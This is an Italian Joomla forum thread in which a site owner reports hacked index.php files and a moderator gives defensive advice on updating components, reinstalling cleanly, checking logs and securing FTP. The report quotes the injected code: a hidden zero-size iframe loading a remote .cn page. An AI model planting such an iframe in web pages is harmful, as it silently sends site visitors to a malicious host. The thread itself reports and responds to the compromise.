File index.php infettati

[net_work]

Salve, scusate se ho postato in un luogo sbagliato, ma non sapevo dove altro segnalare questo mio problema.

Alcuni giorni fa, mi sono ritrovato a non poter più accedere al mio sito, ospitato da un server su altervista. Pensavo il problema fosse loro, ma mi hanno fatto notare che avevo un problema con i miei file index. Controllando meglio, ho notato che erano stati completamente svuotati di contenuto, ovvero il mio file index della home era ridotto a pochi byte di dimensione e all'interno c'era pochissima roba con però in fondo uno strano link a cui la pagina tentava di collegarsi.

Sul mio sito Joomla ho implementato anche SMF 1.4 e ho notato che anche il suo file index esa stato completamente cancellato nel contenuto e lì dentro ci ho trovato solo questa istruzione:

?><!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Come potete vedere, si tratto di un indirizzo a cui si cerca di collegarsi la mia pagina, ma tutti il resto era stato cancellato. Ho sostituito i due file index infettati con i file originali di partenza e fino ad oggi sembra andare tutto bene, fino a che mi sono accorto che i miei index, tentavano ancora di collegarsi a quel maedetto indirizzo; infatto riguardando i file index ho notato che alla fine era ricomparso quel link. Ma per ora i file index sono integri.


Mi potete dare una mano, non so proprio da cosa sia dovuto tutto questo e come faccio a proteggermi? Mi hanno consigliato di aggiornare il mio CSM, ma questo vuol dire aggiornare il mio Joomla? (la quale versione attuale è la 1.0.13) ma non volevo passare ancora lla 1.5


Vi prego aiutatemi in qualche modo.

[bigham]

Ciao net_work.
Benvenuto nel forum di Joomla.it

Scusa il ritardo, sono un moderatore molto pigro

Ti hanno consigliato bene. Ma più che aggiornare il core di joomla quello che è importante è mantenere aggiornati tutti i componenti e moduli installati.
Nel forum troverai una sezione dedicata alla sicurezza di joomla. Comincia a leggerla e soprattutto guarda nella lista dei componenti insicuri se ci sono componenti che hai installato sul tuo sito.

Qualche idea:
Visto che ti hanno attaccato una seconda volta prova a installare una versione di joomla (la 1.0.13b) pulita, ossia senza nessun componente esterno e vedi se lo attaccano nuovamente e se riescono a passare.
Se dovessero bucare il sito potrebbe non essere un problema di joomla ma del server stesso.
Alcune volte vengono sfruttate vulnerabilità del php se questo non viene aggiornato a versioni recenti.

Una volta che hai controllato se i tuoi componenti e moduli sono considerati sicuri potrai installarli un pò alla volta.

Se vuoi capire come hanno fatto a passare dovresti leggere i log del server. Ma questo lo devi chiedere al tuo hoster se e come lo puoi fare.

Instanto cambia la password per l'accesso FTP e, se l'hoster lo consente, vedi di usare l'accesso sicuro via FTP (FTP+SSH)

Ciao